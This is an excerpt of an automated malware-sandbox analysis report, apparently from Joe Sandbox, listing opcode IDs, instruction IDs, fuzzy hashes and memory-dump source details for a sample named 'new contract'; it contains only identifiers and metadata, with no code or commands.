• Instruction Fuzzy Hash: 6BA18F71A01616DBEB25DF69CD90BAAB7A9FF54314F04403DEA4597381EB34E812CB90
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 62a9601b875959a5649f7509493015e7e36ebcaaae727c9843297f95c2ef848c
                                                                                                                                                                            • Instruction ID: 10e7e14395306f0328872087e7d19858c1dcfa4ee0fc004b53fe51c8820764c5
                                                                                                                                                                            • Opcode Fuzzy Hash: 62a9601b875959a5649f7509493015e7e36ebcaaae727c9843297f95c2ef848c
                                                                                                                                                                            • Instruction Fuzzy Hash: 96A1CD72A056129FC721DF18CD80B6ABBEAFF88714F05492CF6859BB51CB34E901CB95
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                                                            • Instruction ID: c876e3de4e49ff765372efbc5095f6f6456314a0517019185ce6f3f8b2ec08a0
                                                                                                                                                                            • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                                                            • Instruction Fuzzy Hash: D4B11571E0061A9FDB29CFA9C890AADBBB5FF88310F14816DEA15A7354D730E941CF94
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f0833b8430aa5a8ce002c45f3140018a7f68ffb3914291b17b287594caa0379d
                                                                                                                                                                            • Instruction ID: 9c548cd10b645f9bec6e11f92875b960c25f9eaff6a5db3462edd7a9bbca3def
                                                                                                                                                                            • Opcode Fuzzy Hash: f0833b8430aa5a8ce002c45f3140018a7f68ffb3914291b17b287594caa0379d
                                                                                                                                                                            • Instruction Fuzzy Hash: A091A171D00216AFDB15CFA8DC94BAEBFB5AF48710F5941A9E610AB341D734ED018FA4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 872d24a9fc816459b3ccbf51f4dbebe2a9b718e4e6a250f5ac9772aa3b7dc9fa
                                                                                                                                                                            • Instruction ID: 616beb3dbc6778b664b4d8b38242cf337d1281f3b313dec9d68e507b25581d2e
                                                                                                                                                                            • Opcode Fuzzy Hash: 872d24a9fc816459b3ccbf51f4dbebe2a9b718e4e6a250f5ac9772aa3b7dc9fa
                                                                                                                                                                            • Instruction Fuzzy Hash: BD914571A01216DBEB24EB5CCC40B79BBB2EFD8724F058569ED059B381E736D902CB61
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 21c3aaef74c5232278a3728bb2dd48cb6c4b8f2a278cf028b96d13097a833f14
                                                                                                                                                                            • Instruction ID: 022202346f8f469fad5aa596878c09f9beb1fb8e57cde962f2da63f470dddaaa
                                                                                                                                                                            • Opcode Fuzzy Hash: 21c3aaef74c5232278a3728bb2dd48cb6c4b8f2a278cf028b96d13097a833f14
                                                                                                                                                                            • Instruction Fuzzy Hash: B88182B1A00A169FEB24CF69C940ABEBBF9FB48700F14852EE455E7740E734D951CBA4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                            • Instruction ID: 41f1f04cbb39e53541e452bd5c31426a8e9b7179fed7d8486ac8feabf07ef05e
                                                                                                                                                                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                            • Instruction Fuzzy Hash: ED819172A012059FDF19CF98C898AAEBBF6BF84310F18866DD9169B344D774D911CB44
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 122db80ae53c561bbe5112dc9e856cad211a39ce0dfe096bddbb806abf45dfdf
                                                                                                                                                                            • Instruction ID: 13c46929b403e44de5d29583776f161ec8fc72c7ed9f5e64699d7dfacb5cf2be
                                                                                                                                                                            • Opcode Fuzzy Hash: 122db80ae53c561bbe5112dc9e856cad211a39ce0dfe096bddbb806abf45dfdf
                                                                                                                                                                            • Instruction Fuzzy Hash: BB817C71A00609AFDF65CFA9CC80AEEFBBAFB88354F10442DE955A7211D731AD05CB60
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d6d68a04610a30a296caae1acb9f71b294c9571016894663e1ec4f601214cdcf
                                                                                                                                                                            • Instruction ID: 2cc57f6de0ec2f2537262dc7aada4be63025e71d43f855e6d777411e478de2de
                                                                                                                                                                            • Opcode Fuzzy Hash: d6d68a04610a30a296caae1acb9f71b294c9571016894663e1ec4f601214cdcf
                                                                                                                                                                            • Instruction Fuzzy Hash: 2471CE75D04669DBCB26DF58CC90BBEBBB5FF98710F14821AE942AB350D7709801CBA0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 63570eaf87053ff5610b5b079cc706a99ae200feb29fdd78967d763c95e4ba03
                                                                                                                                                                            • Instruction ID: ae05f736f7307935b4b0ec1b72852f0912a00951d49ce346b874a7bf10c98ee9
                                                                                                                                                                            • Opcode Fuzzy Hash: 63570eaf87053ff5610b5b079cc706a99ae200feb29fdd78967d763c95e4ba03
                                                                                                                                                                            • Instruction Fuzzy Hash: A9719F70D01205EFDB20CF5DDD45AAABBF9EB91710B05815EFA00AB658CB71DD80CB59
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7004aa116b2bc2dc45250a15f36ea5bfe7665cefdac0af507811211e95a72139
                                                                                                                                                                            • Instruction ID: 7d398a5e2002eba43e0ade38e5e4082f78e672cbccf8922da7f179543aede33b
                                                                                                                                                                            • Opcode Fuzzy Hash: 7004aa116b2bc2dc45250a15f36ea5bfe7665cefdac0af507811211e95a72139
                                                                                                                                                                            • Instruction Fuzzy Hash: CD71CF31A046528FD312DF2CC890B2AB7E6FFC5710F0885ADE8958B352DB34D846CB95
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                            • Instruction ID: e403c160b5ae3c305ef3440644f79790940e673171110a7a32f361d189b7b095
                                                                                                                                                                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                            • Instruction Fuzzy Hash: F0715C71A0061AAFDB10DFA9CD84A9EBBBAFF88700F504569E545E7250DB34EE01CF94
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e5581b752c62875234e3d1519cb6840a6493d106f2f9ac486912ad5da966dae4
                                                                                                                                                                            • Instruction ID: 7d2759da3e417d8551ac45db08c5e6e0f6216bb58469353723f31d81106d6544
                                                                                                                                                                            • Opcode Fuzzy Hash: e5581b752c62875234e3d1519cb6840a6493d106f2f9ac486912ad5da966dae4
                                                                                                                                                                            • Instruction Fuzzy Hash: EF71E332241B01AFE732DF18CC94F96BBB6EF40724F14842CE656872A1D779E984CB50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a8751ac47de7da0414d9888351a151bc88e40223ec6b263ce58dd71c16a862f7
                                                                                                                                                                            • Instruction ID: 0a90b5bd036825e13e66a9285cb6e2fa60ddc04ab32f1ee850d1e03972b69808
                                                                                                                                                                            • Opcode Fuzzy Hash: a8751ac47de7da0414d9888351a151bc88e40223ec6b263ce58dd71c16a862f7
                                                                                                                                                                            • Instruction Fuzzy Hash: A8818C72A043168BDB24DF9CDDA4B6DB7FABB48320F19822DD901AB381C7749941CB94
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f765375da1e71ca55ec22ed6b5f49cba3462187fc586b62d4b0eaf39f2c6945b
                                                                                                                                                                            • Instruction ID: d1462d05d27c0d1d0e35a4a7e85ad7c06b23709f7834d01f782c09be16a939ec
                                                                                                                                                                            • Opcode Fuzzy Hash: f765375da1e71ca55ec22ed6b5f49cba3462187fc586b62d4b0eaf39f2c6945b
                                                                                                                                                                            • Instruction Fuzzy Hash: 3D71F572E0021AABDF16DB94CC81FAEBBB9FB04354F10416DE621A7290D774AA45CB94
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: fe6320159ca80fd8bc485de6d71253932a883a7b624e68ae2ad1256ff1b9b165
                                                                                                                                                                            • Instruction ID: 03b88e38e32c9e88c0b6a7c6908814ce8b4e522a4323962b4b44d0469ccff163
                                                                                                                                                                            • Opcode Fuzzy Hash: fe6320159ca80fd8bc485de6d71253932a883a7b624e68ae2ad1256ff1b9b165
                                                                                                                                                                            • Instruction Fuzzy Hash: 7551CF72909612AFD721DEA8CC44E6BBBE9EBC9750F01092DFA40DB250D774ED05C7A2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 524006e6b39ad7083f8f1a2ba966a3909e00f4ce9678b9b593f1111ff41b6406
                                                                                                                                                                            • Instruction ID: e068137f2802661ce8219c44c428f8a8c999cc0a4d96abeb1a27d9f528546a23
                                                                                                                                                                            • Opcode Fuzzy Hash: 524006e6b39ad7083f8f1a2ba966a3909e00f4ce9678b9b593f1111ff41b6406
                                                                                                                                                                            • Instruction Fuzzy Hash: F9518A709007059BD731DF9AC884AABFBFDFF94B10F10861ED296976A1C7B0A945CB90
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: cd8195e1256435247d2f0a5170072678abe13ccf12752bde6baef1a95e70dcec
                                                                                                                                                                            • Instruction ID: 21eb06d41f731e57e34b7f86a29dfe2ff2a3019dce811ef52760985fd1c1687d
                                                                                                                                                                            • Opcode Fuzzy Hash: cd8195e1256435247d2f0a5170072678abe13ccf12752bde6baef1a95e70dcec
                                                                                                                                                                            • Instruction Fuzzy Hash: 71514971200A059FCB22EFA9CD80EAAB7BEFF54794F40046DE94297360D735EA41CB54
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2760353adb8f8ac4d9d6209577decbe20cd55f5e6dfeb9532ca289429992ba62
                                                                                                                                                                            • Instruction ID: f32179fed5c886bff7b1a79377244a582af60b76067951201541e6172ce72e21
                                                                                                                                                                            • Opcode Fuzzy Hash: 2760353adb8f8ac4d9d6209577decbe20cd55f5e6dfeb9532ca289429992ba62
                                                                                                                                                                            • Instruction Fuzzy Hash: 3D5145716083028FD754DF2AC891A6BBBE6FFC8A14F44492DF589C7350EB34D9068B96
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                            • Instruction ID: 6a00cc6b9300ea75c806c1ccb20a24f0ff47e819058b8682470c586fe9ec3788
                                                                                                                                                                            • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                            • Instruction Fuzzy Hash: 8451AE71E0021AABDF15DF98C841BFEBBBAAF44354F144169EA01AB340DB34DD45CBA4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                                                            • Instruction ID: df21c0df117999644209f8f1acd06be9b094b5ddbdd72e65b8bc159bcdad68bf
                                                                                                                                                                            • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                                                            • Instruction Fuzzy Hash: 2D51EB31D0021AEFDF11DF94CD98BAEBB79AF00314F514669DA1267290D7329D40CFA4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 13b74418473cd989d863daa5d5ffbecb637153babecc9f5d771b1b586ede1716
                                                                                                                                                                            • Instruction ID: 5d7023f05a4a96c9456897ae9b764d9fa7ba9be8894af1dfcdca69672efeebc3
                                                                                                                                                                            • Opcode Fuzzy Hash: 13b74418473cd989d863daa5d5ffbecb637153babecc9f5d771b1b586ede1716
                                                                                                                                                                            • Instruction Fuzzy Hash: 9541D1707036119BDA29DB2DCD9CB3BBBDEEF91620F048718E9558B384DB34D811C690
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 83f9d6e7c19daab5321b1469ae9df5b915a8de8eae4b9d6ce58f23e7b1e82893
                                                                                                                                                                            • Instruction ID: 7fcfe2220be78bd7fa584ea42673db60a2239e3904e6fd58ad0382af0354f35b
                                                                                                                                                                            • Opcode Fuzzy Hash: 83f9d6e7c19daab5321b1469ae9df5b915a8de8eae4b9d6ce58f23e7b1e82893
                                                                                                                                                                            • Instruction Fuzzy Hash: 78517B7290021ADFCB20EFA9CD909AEBBF9FB48364B908519E546A7304D770AD01CFD0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
• API String ID:
• Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
• Instruction ID: 25731a8af0a6e91cfb89719a6d9c18c50b4068224925179b1d56f8957256abe9
• Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
• Instruction Fuzzy Hash: A941D8716067169FDB25CF98CD88A6AB7EAFF90210B05472DED5287340EB30ED19C794
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 546987dcad1c498ab5279342411c9e79d226ecc577d66fd4caa93dbefc3a8293
• Instruction ID: 549f79feb8d927499f11617bd88ab0b902780ae32f8f330e544f66f22b1ff412
• Opcode Fuzzy Hash: 546987dcad1c498ab5279342411c9e79d226ecc577d66fd4caa93dbefc3a8293
• Instruction Fuzzy Hash: EC41893690021A9BDB54DFA8C840AEEBBB9AF48710F14816AFD15A7340D735DD42CBA8
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 37724d1881b2b2b708040a65d83650aaa0ee5dbd34d1184b6b5115df40c8fccd
• Instruction ID: 64514c6c09e7f83c497c555227814ab84c19d465e267f4b76ac8963d51ff0a19
• Opcode Fuzzy Hash: 37724d1881b2b2b708040a65d83650aaa0ee5dbd34d1184b6b5115df40c8fccd
• Instruction Fuzzy Hash: 9041E4726043029FD721EF28CC80A27B7EAFF88224F00496DEA67C7351DB36E8458B54
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
• Instruction ID: 3953179b332e5914af633ccae4cf7351b9c6a04263c1b00be3bf22cc3885ffa6
• Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
• Instruction Fuzzy Hash: A1514775A016158FCB15CF99C880AAEF7F6FF84720F2481A9D915EB351D730AA42CB90
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4d6976be4c986086d858ef8b7f7372ba26e8c5a6be1a982e7aed62a26cb34250
• Instruction ID: c363a290b220ddbbf2e617cbab8dba822527e4513cb25278fcb7e188674fb239
• Opcode Fuzzy Hash: 4d6976be4c986086d858ef8b7f7372ba26e8c5a6be1a982e7aed62a26cb34250
• Instruction Fuzzy Hash: 9D512670905626DBDB25DB2CCC10BA8BBB1FF12314F1482A9E929A77D1D774A981CF84
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 875237efb0db576cdadba43a0ae9736c69f4718deb36c483342246b4c320aa69
• Instruction ID: 2f670beee38e984a21f1e958648bb563047613ef7066689c697d15962c3d2862
• Opcode Fuzzy Hash: 875237efb0db576cdadba43a0ae9736c69f4718deb36c483342246b4c320aa69
• Instruction Fuzzy Hash: BB41A076A406289FDB21DF68CD40BEA77B9EF45740F0100A9E908AB341D734DE85CF95
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
• Instruction ID: 901f07b6d5d1972f02ab432b544172814d36648929a0c5e3621db966082a0f31
• Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
• Instruction Fuzzy Hash: 80419475B01115ABDF15DB99CC88ABFBBFEAF84600F1541A9E904A7341D770DD018BA0
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 67edd7190d05653a7d8a1c83615253c8d533b6b11070529a377c45c84d0bc549
• Instruction ID: bcb5afaf59b461532b34b43f98f1731f9db38cd5b66bcf611f6ae21a25064cca
• Opcode Fuzzy Hash: 67edd7190d05653a7d8a1c83615253c8d533b6b11070529a377c45c84d0bc549
• Instruction Fuzzy Hash: A941B171A00B129FE725CF28CC80A22B7F9FF89314B109A6DE55787A51E774E846CF94
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6d7c56a50e0c9bd8a3d761890e6814c00644f15faee4f84cf2c48b5aa08e31d9
• Instruction ID: 5b4c180df1d423c97980fff2f149e09a96127b557f4ba7df3f17d527d33f0c76
• Opcode Fuzzy Hash: 6d7c56a50e0c9bd8a3d761890e6814c00644f15faee4f84cf2c48b5aa08e31d9
• Instruction Fuzzy Hash: 2541FF32A81205DFDB25DFACCD94BED7BB5FB58320F084269D412AB381DB349901CBA4
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 300b131e7f6212a12d03df04e72d32f44bef4fb2d664948d856cc7d5ed10728a
• Instruction ID: ec21cdcb056093aae703c357e254329e75f9597c5a9313efcd2af16283f319ef
• Opcode Fuzzy Hash: 300b131e7f6212a12d03df04e72d32f44bef4fb2d664948d856cc7d5ed10728a
• Instruction Fuzzy Hash: 6141DF72A00622CBD7249F5CCC80A5ABBFAFBA4724F18812ED9029B755C735D842CF90
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
